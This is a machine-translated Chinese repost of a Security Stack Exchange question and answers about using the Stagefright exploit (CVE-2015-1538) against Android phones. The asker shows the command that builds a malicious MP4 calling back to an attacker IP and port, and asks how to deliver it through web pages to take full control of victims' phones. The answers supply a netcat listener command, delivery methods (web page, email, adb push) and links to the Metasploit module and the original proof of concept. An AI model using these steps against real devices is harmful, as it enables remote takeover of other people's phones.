首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >三星Galaxy S3运行JB4.3的记录

三星Galaxy S3运行JB4.3的记录
EN

Security用户
提问于 2017-02-27 07:14:41
回答 2查看 503关注 0票数 2

我最近对Stagefright做了很多研究,并且已经证实许多运行Android及以下版本的手机都很容易受到攻击。

因此,由于我的S3确实容易受到利用齐姆氏Stagefright检测器应用程序的攻击,所以我决定对其进行测试。

我下载了约书亚·德雷克的stagefright代码(mp4.py),并通过运行以下命令成功地创建了恶意MP4文件:

代码语言:javascript
运行
复制
python mp4.py -c 192.168.x.x -p 4444

C表示局域网IP

P表示端口号

现在,很多在线教程说,在通过彩信将MP4文件发送到目标手机之前,我必须使用netcat设置一个后门。然而,我发现使用metasploit创建一个后门更有效地获得了对电话的完全控制。

我听说您还可以将MP4或其他多媒体文件嵌入到网页中,这样当受害者访问网页时,您就可以像上面提到的那样完全控制电话。

,那么这是如何实现的?

EN

回答 2

Security用户

回答已采纳

发布于 2017-02-27 14:10:14

你必须在你的电脑上安装netcat,而不是在设备上安装。在侦听模式下为所选端口设置此netcat:

代码语言:javascript
运行
复制
nc -lp 4444

该设备将通过播放伪造的视频文件获得它的netcat。你不需要彩信就能把视频发到电话里。您可以将视频嵌入到网页中,通过电子邮件发送,或者只需使用adb push命令将其存储在设备上。在此之后,使用标准视频播放器播放视频,您将从您的PC命令行控制设备。

票数 1
EN

Security用户

发布于 2017-02-27 19:54:52

尝试Metasploit模块:https://github.com/rapid7/metasploit-framework/pull/4742

另外,来自Josua Drake的原作PoC https://github.com/jduck/cve-2015-1538-1

首先,它不是一个通用的利用。它只在单一的设备模型上进行测试。我的目标是运行Android4.0.4的Galaxy设备,它只包含了ASLR的部分实现。

要在另一个设备上使用它,您必须知道ROP链小工具的libc.so函数地址。

票数 1
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/152464

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档